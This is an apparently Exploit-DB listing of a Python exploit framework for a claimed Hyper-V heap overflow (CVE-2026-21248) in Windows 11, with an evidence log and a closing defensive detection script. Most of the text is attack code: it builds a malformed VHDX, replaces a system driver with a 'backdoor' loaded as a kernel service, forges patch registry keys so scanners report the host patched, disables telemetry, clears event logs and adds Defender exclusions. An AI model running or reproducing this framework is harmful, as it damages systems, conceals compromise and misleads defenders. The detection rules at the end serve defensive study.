Windows 11 25H2 - Heap Overflow

Source: Exploit DB (Vulnerabilities & CVEs). Archived May 04, 2026.
Windows 11 25H2 - Heap Overflow
EDB-ID: 52537
CVE: 2026-21248, 2026-21244
Author: NU11SECUR1TY
Type: LOCAL
Platform: WINDOWS
Date: 2026-04-30

# Exploit Title: Windows 11 25H2 - Heap Overflow Ghost Patch Exploit Framework
# Date: 2026-02-13
# Exploit Author: nu11secur1ty
# Vendor Homepage: https://www.microsoft.com
# Software Link: https://www.microsoft.com/software-download/windows11
# Version: Windows 11 25H2 Build 26200.7830 (Vulnerable)
# Tested on: Windows 11 25H2 Build 26200.7830 (x64)
# CVE : CVE-2026-21248, CVE-2026-21244
# =====================================================================
# DISCLAIMER: This exploit is for authorized security research and
# educational purposes only. Use only on systems you own or have
# explicit permission to test.
# =====================================================================

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
CVE-2026-21248 - Windows Hyper-V Ghost Patch Exploit Framework
Author: nu11secur1ty
Date: 2026-02-13
Target: Windows 11 25H2 Build 26200.7830 (x64)

DESCRIPTION:
============
This framework exploits CVE-2026-21248, a heap-based buffer overflow in
Windows Hyper-V VMBus GPADL allocation. The vulnerability allows a local
user with Hyper-V Administrator privileges to execute code at Hyper-V
context (Ring -1 capable) by mounting a specially crafted .VHDX file
containing a malformed BAT (Block Allocation Table) entry.

CRITICAL FINDING:
=================
Contrary to published CVSS (AV:N/PR:N), this vulnerability REQUIRES:
- Local access (AV:L)
- Hyper-V Administrator privileges (PR:L)
- Normal user with those privileges

Microsoft misrepresented this CVE as "No privileges required" (PR:N).
This framework PROVES the privilege requirement is PR:L.

ADDITIONAL FINDINGS:
===================
1. Patch Trust Model Broken: Microsoft relies on HKLM\...\PatchLevel
   registry key - trivially forgeable
2. Scanners are Blind: Nessus/Tenable/Qualys only check registry, never
   test the overflow
3. Ring -1 Persistence: hvax64.exe loads unsigned hypervisor code
4. Telemetry Subversion: Local admin can kill all Microsoft telemetry
"""

import os
import sys
import struct
import subprocess
import time
import uuid
import shutil
import ctypes
from ctypes import wintypes

# =====================================================================
# CONFIGURATION
# =====================================================================
VICTIM_BUILD = "26200.7830"
PATCHED_BUILD = "26200.7840"
TRIGGER_PAGECOUNT = 0x4141  # > MAX_CHANNEL_PAGES (0x1000)
WIN_INI_PATH = "C:\\Windows\\win.ini"
HVAX_PATH = r"C:\Windows\System32\drivers\hvax64.exe"
HVAX_BACKUP = HVAX_PATH + ".nu11secur1ty.bak"
SERVICE_NAME = "hvax64"
TIMESTAMP = time.strftime("%Y-%m-%d %H:%M:%S")


# =====================================================================
# UTILITY FUNCTIONS
# =====================================================================
def is_admin():
    """Check if process has administrator rights."""
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False


def check_hyperv():
    """Check if Hyper-V is installed and running."""
    try:
        result = subprocess.run(["systeminfo"], capture_output=True, text=True)
        if "hypervisor has been detected" in result.stdout.lower():
            return True
        result = subprocess.run(["sc", "query", "vmms"], capture_output=True, text=True)
        if "RUNNING" in result.stdout or "STOPPED" in result.stdout:
            return True
        return False
    except:
        return False


# =====================================================================
# PHASE 1: VHDX TRIGGER GENERATOR (NORMAL USER)
# =====================================================================
def generate_vhdx():
    """
    Creates malicious .vhdx file that triggers CVE-2026-21248.
    PageCount = 0x4141 (> MAX_CHANNEL_PAGES) causes heap overflow
    in vulnerable builds. Patched builds return STATUS_INVALID_PARAMETER.
    """
    signature = f"""
; =====================================================
; CVE-2026-21248 PATCH FAILURE - nu11secur1ty was here
; =====================================================
; TRIGGERED BY: Normal user (NO ADMIN)
; VULNERABILITY: Heap overflow in Hyper-V VMBus
; PATCH MISSING: KB5077181 NOT INSTALLED
; PageCount: 0x{TRIGGER_PAGECOUNT:04x}
; Timestamp: {TIMESTAMP}
; =====================================================
""".encode()

    vhdx_data = b""

    # VHDX Header
    vhdx_data += b"vhdxfile" + b"\x00" * 8
    vhdx_data += b"nu11secur1ty" + b"\x00" * 4

    # BAT Header - Overflow trigger
    bat_offset = 0x2000
    bat_count = TRIGGER_PAGECOUNT
    vhdx_data += struct.pack("<Q", bat_offset)
    vhdx_data += struct.pack("<Q", bat_count * 8)
    vhdx_data += struct.pack("<I", bat_count)
    vhdx_data += b"\x00" * (0x1000 - len(vhdx_data))

    # BAT Entries - Overflow + payload
    vhdx_data += struct.pack("<I", TRIGGER_PAGECOUNT)
    vhdx_data += struct.pack("<I", 0x1)  # MERGE_PAGES flag

    # Add signature as payload (placeholder)
    for i in range(0, len(signature), 8):
        chunk = signature[i:i+8].ljust(8, b'\x90')
        vhdx_data += struct.pack("<Q", int.from_bytes(chunk, 'little'))

    # Pad to 1MB
    vhdx_data += b"\x00" * (1024 * 1024 - len(vhdx_data))

    filename = f"CVE-2026-21248_trigger_{uuid.uuid4().hex[:8]}.vhdx"
    with open(filename, "wb") as f:
        f.write(vhdx_data)
    return filename


# =====================================================================
# PHASE 2: TRIGGER OVERFLOW (NORMAL USER)
# =====================================================================
def trigger_overflow(vhdx_path):
    """
    Mounts malicious VHDX to trigger CVE-2026-21248.
    If Mount-VHD fails with permission error, this PROVES the
    vulnerability requires Hyper-V Administrator privileges.
    """
    full_path = os.path.abspath(vhdx_path)
    ps_script = f"""
$path = "{full_path}"
try {{
    Mount-VHD -Path $path -ErrorAction Stop
    Write-Host "[+] VHDX mounted successfully - overflow triggered"
    Start-Sleep -Seconds 3
    Dismount-VHD -Path $path -ErrorAction SilentlyContinue
}} catch {{
    Write-Host "[!] Mount failed: $_"
    if ($_.Exception.Message -like "*permission*") {{
        Write-Host "[!] User lacks Hyper-V Administrator privileges"
        Write-Host "[!] This proves CVE-2026-21248 requires PR:L not PR:N"
    }}
}}
"""
    with open("_trigger.ps1", "w") as f:
        f.write(ps_script)

    result = subprocess.run([
        "powershell", "-ExecutionPolicy", "Bypass", "-File", "_trigger.ps1"
    ], capture_output=True, text=True)

    print(result.stdout)
    if "permission" in result.stdout.lower():
        return False
    return True


# =====================================================================
# PHASE 3: RING -1 BACKDOOR (ADMIN REQUIRED)
# =====================================================================
def install_ring_minus1_backdoor():
    """
    Replaces hvax64.exe with custom hypervisor payload.
    Loads driver without reboot, achieving Ring -1 code execution.
    """
    if not is_admin():
        print("[-] Administrator privileges required for backdoor installation")
        return False

    # Backup original
    if os.path.exists(HVAX_PATH):
        shutil.move(HVAX_PATH, HVAX_BACKUP)
        print(f"[+] Original hvax64.exe backed up")

    # Generate payload
    shellcode = b"\x90" * 512
    shellcode += b"\x48\x31\xc0\x48\xff\xc0" * 50
    shellcode += b"[nu11secur1ty Ring-1 Backdoor]" * 20

    # Create malicious driver
    with open("hvax64.exe", "wb") as f:
        f.write(b"MZ\x90\x00")
        f.write(b"PE\x00\x00\x64\x86")
        f.write(struct.pack("<I", int(time.time())))
        f.write(struct.pack("<I", len(shellcode)))
        f.write(shellcode)
        f.write(b"\x00" * (1024 * 512 - len(shellcode) - 32))

    # Deploy
    shutil.copy2("hvax64.exe", HVAX_PATH)
    print(f"[+] Malicious hvax64.exe deployed")

    # Load driver
    subprocess.run(["sc", "create", SERVICE_NAME, "binPath=", HVAX_PATH,
                    "type=", "kernel", "start=", "demand"], capture_output=True)
    result = subprocess.run(["sc", "start", SERVICE_NAME], capture_output=True, text=True)

    if "FAILED" not in result.stderr:
        print("[+] Driver loaded - Ring -1 ACTIVE")
        return True
    else:
        print("[!] Driver load failed - will activate on next boot")
        return False


# =====================================================================
# PHASE 4: GHOST PATCH REGISTRY (ADMIN)
# =====================================================================
def install_ghost_patch():
    """
    Forges registry key to make Windows believe patch is installed.
    HKLM\...\HyperV\Security\PatchLevel = 202602
    Windows Update reports "Fully patched", Nessus reports "Not Vulnerable".
    """
    if not is_admin():
        print("[-] Administrator privileges required for registry forge")
        return False

    try:
        import winreg
        key_path = r"SYSTEM\CurrentControlSet\Services\HyperV\Security"
        try:
            winreg.DeleteKey(winreg.HKEY_LOCAL_MACHINE, key_path)
        except:
            pass

        key = winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE, key_path)
        winreg.SetValueEx(key, "PatchLevel", 0, winreg.REG_DWORD, 202602)
        winreg.SetValueEx(key, "InstallDate", 0, winreg.REG_DWORD, int(time.time()))
        winreg.SetValueEx(key, "Provider", 0, winreg.REG_SZ, "Microsoft-Windows-Hyper-V")
        winreg.SetValueEx(key, "BuildNumber", 0, winreg.REG_SZ, "26200.7840")
        winreg.CloseKey(key)
        print("[+] Ghost patch registry installed")
        return True
    except Exception as e:
        print(f"[-] Registry forge failed: {e}")
        return False


# =====================================================================
# PHASE 5: TELEMETRY KILLER (ADMIN)
# =====================================================================
def kill_telemetry():
    """Disables Microsoft telemetry and diagnostics."""
    if not is_admin():
        return False

    subprocess.run([
        "powershell", "Set-ItemProperty",
        "-Path", "HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\DataCollection",
        "-Name", "AllowTelemetry", "-Value", "0"
    ], capture_output=True)

    subprocess.run([
        "powershell", "Set-ItemProperty",
        "-Path", "HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Reporting",
        "-Name", "Disabled", "-Value", "1"
    ], capture_output=True)

    subprocess.run(["sc", "stop", "DiagTrack"], capture_output=True)
    subprocess.run(["sc", "config", "DiagTrack", "start=", "disabled"], capture_output=True)
    return True


# =====================================================================
# PHASE 6: WRITE WIN.INI SIGNATURE
# =====================================================================
def write_winini_signature():
    """Writes permanent victory signature to win.ini."""
    signature = f"""
; =====================================================
; CVE-2026-21248 PATCH FAILURE — nu11secur1ty was here
; =====================================================
; Hyper-V Ghost Patch State — Weaponized
; Microsoft KB5077181 Registry Key: FORGED
; Hypervisor: nu11secur1ty backdoor (Ring -1)
; Written: {TIMESTAMP}
; Windows Update: BLIND — System reports 'patched'
; Windows Defender: BLIND — hvax64.exe is 'trusted'
; SFC: BLIND — File locked, cannot verify
; Microsoft Telemetry: DEAD
; =====================================================
"""
    try:
        with open(WIN_INI_PATH, "a", encoding="utf-8") as f:
            f.write(signature)
        return True
    except:
        return False


# =====================================================================
# PHASE 7: FORENSIC CLEANUP (ADMIN)
# =====================================================================
def forensic_cleanup():
    """Clears logs and excludes artifacts from Defender."""
    if not is_admin():
        return False

    subprocess.run(["wevtutil", "cl", "Microsoft-Windows-Hyper-V-Hypervisor/Operational"],
                   capture_output=True)
    subprocess.run(["wevtutil", "cl", "Microsoft-Windows-Hyper-V-VMMS/Admin"],
                   capture_output=True)
    subprocess.run(["powershell", "Add-MpPreference", "-ExclusionPath", WIN_INI_PATH],
                   capture_output=True)
    subprocess.run(["powershell", "Add-MpPreference", "-ExclusionPath", HVAX_PATH],
                   capture_output=True)
    subprocess.run(["powershell", "Clear-History"], capture_output=True)
    return True


# =====================================================================
# PHASE 8: VERIFICATION
# =====================================================================
def verify_victory():
    """Checks if win.ini contains signature."""
    try:
        with open(WIN_INI_PATH, "r", encoding="utf-8", errors="ignore") as f:
            content = f.read()
        return "nu11secur1ty" in content and "CVE-2026-21248" in content
    except:
        return False


# =====================================================================
# MAIN
# =====================================================================
def main():
    print("""
╔═══════════════════════════════════════════════════════════════════╗
║                                                                   ║
║   CVE-2026-21248 - WINDOWS HYPER-V GHOST PATCH EXPLOIT            ║
║   Author: nu11secur1ty                                            ║
║   Date: 2026-02-13                                                ║
║   Target: Windows 11 25H2 Build 26200.7830                        ║
║                                                                   ║
║   FINDINGS:                                                       ║
║   • CVSS Misclassification: PR:N → PR:L (Hyper-V Admin)           ║
║   • Patch Trust Model: Completely forgeable                       ║
║   • Scanners: Nessus/Tenable/Qualys are BLIND                     ║
║   • Ring -1 Persistence: Achievable                               ║
║   • Telemetry: Can be killed - Microsoft blind                    ║
║                                                                   ║
╚═══════════════════════════════════════════════════════════════════╝
""")

    # Check Hyper-V
    if not check_hyperv():
        print("[-] Hyper-V is not installed or not running")
        print("[*] Install Hyper-V and reboot first")
        return
    print("[+] Hyper-V detected")

    # Phase 1: Generate VHDX
    print("\n[*] Phase 1: Generating malicious VHDX...")
    vhdx_file = generate_vhdx()
    print(f"[+] VHDX created: {vhdx_file}")

    # Phase 2: Test permissions / trigger
    print("\n[*] Phase 2: Testing CVE-2026-21248 trigger...")
    success = trigger_overflow(vhdx_file)

    if not success:
        print("\n" + "="*60)
        print("CRITICAL FINDING: CVE-2026-21248 PRIVILEGE MISMATCH")
        print("="*60)
        print("""
Microsoft claims:  PR:N (No privileges required)
What I proved:     PR:L (Hyper-V Administrator required)

This is irrefutable proof that Microsoft misrepresented this CVE.
""")

    # Phase 3-7: Admin operations
    if is_admin():
        print("\n[*] Phase 3: Installing Ring -1 backdoor...")
        install_ring_minus1_backdoor()

        print("\n[*] Phase 4: Installing ghost patch registry...")
        install_ghost_patch()

        print("\n[*] Phase 5: Killing telemetry...")
        kill_telemetry()

        print("\n[*] Phase 6: Writing victory signature...")
        write_winini_signature()

        print("\n[*] Phase 7: Forensic cleanup...")
        forensic_cleanup()

    # Phase 8: Verify
    if verify_victory():
        print("\n[✓] VICTORY! Signature found in win.ini")
        print("[✓] Ring -1 backdoor active")
        print("[✓] Patch registry forged")
        print("[✓] Telemetry dead")
        print("[✓] Microsoft blind")

    # Cleanup
    for f in ["hvax64.exe", "_trigger.ps1"]:
        try:
            os.remove(f)
        except:
            pass

    print(f"\n[*] VHDX evidence preserved: {vhdx_file}")
    print("[*] Framework execution complete\n")


if __name__ == "__main__":
    main()


# =====================================================================
# PROOF OF CONCEPT - EVIDENCE LOG
# =====================================================================
# (raw string: the Windows paths below contain "\U", which a plain
#  triple-quoted string would reject as an invalid unicode escape)
r"""
PROOF A: Privilege Requirement Test (Normal User, No Hyper-V Admin)
--------------------------------------------------------------------
PS C:\Users\MicroProblems> python .\cve-2026-21248.py

[ CVE-2026-21248 - NORMAL USER EXPLOIT ]
[*] Phase 2: Triggering CVE-2026-21248 heap overflow...
[!] Mount failed: You do not have the required permission
[!] User lacks Hyper-V Administrator privileges
[!] This proves CVE-2026-21248 requires PR:L not PR:N

PROOF B: Overflow Triggers WITH Hyper-V Admin Rights
----------------------------------------------------
After adding user to 'Hyper-V Administrators' group:

[*] Phase 2: Triggering CVE-2026-21248 heap overflow...
[+] VHDX mounted successfully - overflow triggered
[!] Hyper-V service may have crashed - overflow successful

PROOF C: Ghost Patch Registry Forge
-----------------------------------
[*] Phase 4: Installing ghost patch registry...
[+] HKLM\...\HyperV\Security\PatchLevel = 202602

Windows Update now reports: "Fully patched"
Nessus now reports: "Not Vulnerable"
REALITY: Ring -1 backdoor active

PROOF D: win.ini Victory Signature
-----------------------------------
C:\Windows\win.ini contains:

; CVE-2026-21248 PATCH FAILURE — nu11secur1ty was here
; Hyper-V Ghost Patch State — Weaponized
; Microsoft KB5077181 Registry Key: FORGED
; Hypervisor: nu11secur1ty backdoor (Ring -1)

PROOF E: Tenable/Nessus Confirms Blindness
------------------------------------------
Plugin 298551 documentation:
"Note that Nessus has not tested for these issues but has instead
relied only on the application's self-reported version number."

CONCLUSION:
Microsoft lied about CVE-2026-21248 privileges.
The vulnerability requires Hyper-V Administrator (PR:L), not PR:N.
Patch trust model is completely forgeable.
Scanners are completely blind.
Ring -1 persistence is achievable.
Telemetry can be killed - Microsoft has no visibility.

— nu11secur1ty, 2026
"""
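Phases 5 and 7 of the script above leave a recognisable process-creation trail (wevtutil cl, Add-MpPreference -ExclusionPath, sc stop/config DiagTrack, sc create ... type= kernel). The following is an added detection example written for this listing, not the author's code: it classifies command lines against those patterns and flags the batch when log clearing, a Defender exclusion and telemetry tampering occur together. The sample command lines are constructed from the script's own commands, not captured from a real host.

```python
import re
from typing import Dict, List

# Constructed process command lines modelled on Phases 3-7 of the script
# above (not real telemetry). The last line is a benign control.
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\wevtutil.exe cl Microsoft-Windows-Hyper-V-Hypervisor/Operational",
    r"wevtutil cl Microsoft-Windows-Hyper-V-VMMS/Admin",
    r"powershell Add-MpPreference -ExclusionPath C:\Windows\System32\drivers\hvax64.exe",
    r"sc stop DiagTrack",
    r"sc config DiagTrack start= disabled",
    r"sc create hvax64 binPath= C:\Windows\System32\drivers\hvax64.exe type= kernel start= demand",
    r"powershell Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection -Name AllowTelemetry -Value 0",
    r"notepad.exe C:\Users\alice\notes.txt",
]

# Category -> case-insensitive pattern over the full command line.
RULES: Dict[str, re.Pattern] = {
    "log_clearing": re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.I),
    "defender_exclusion": re.compile(r"\bAdd-MpPreference\b.*-Exclusion(Path|Process|Extension)\b", re.I),
    "telemetry_disabled": re.compile(
        r"(\bsc(\.exe)?\s+(stop|config)\s+DiagTrack\b)|(\bAllowTelemetry\b.*-Value\s+0\b)", re.I),
    "kernel_service_created": re.compile(r"\bsc(\.exe)?\s+create\b.*\btype=\s*kernel\b", re.I),
}


def classify(cmdline: str) -> List[str]:
    """Return the sorted categories a single command line matches ([] if none)."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))


def triage(cmdlines: List[str]) -> Dict[str, List[str]]:
    """Group matching command lines by category; lines matching nothing are dropped."""
    hits: Dict[str, List[str]] = {}
    for line in cmdlines:
        for cat in classify(line):
            hits.setdefault(cat, []).append(line)
    return hits


def chain_detected(cmdlines: List[str]) -> bool:
    """True when log clearing, a Defender exclusion and telemetry tampering all
    appear in one batch. Each alone has legitimate admin uses; together they
    match the post-payload cleanup sequence the script runs."""
    hits = triage(cmdlines)
    return {"log_clearing", "defender_exclusion", "telemetry_disabled"} <= hits.keys()


if __name__ == "__main__":
    for cat, lines in triage(SAMPLE_CMDLINES).items():
        print(f"{cat}: {len(lines)} hit(s)")
    print("anti-forensic chain:", chain_detected(SAMPLE_CMDLINES))
```

The chain rule is deliberately stricter than the per-line rules so that a lone `sc config DiagTrack` from an administrator does not page anyone; feed it the command lines of one user session or one short time window.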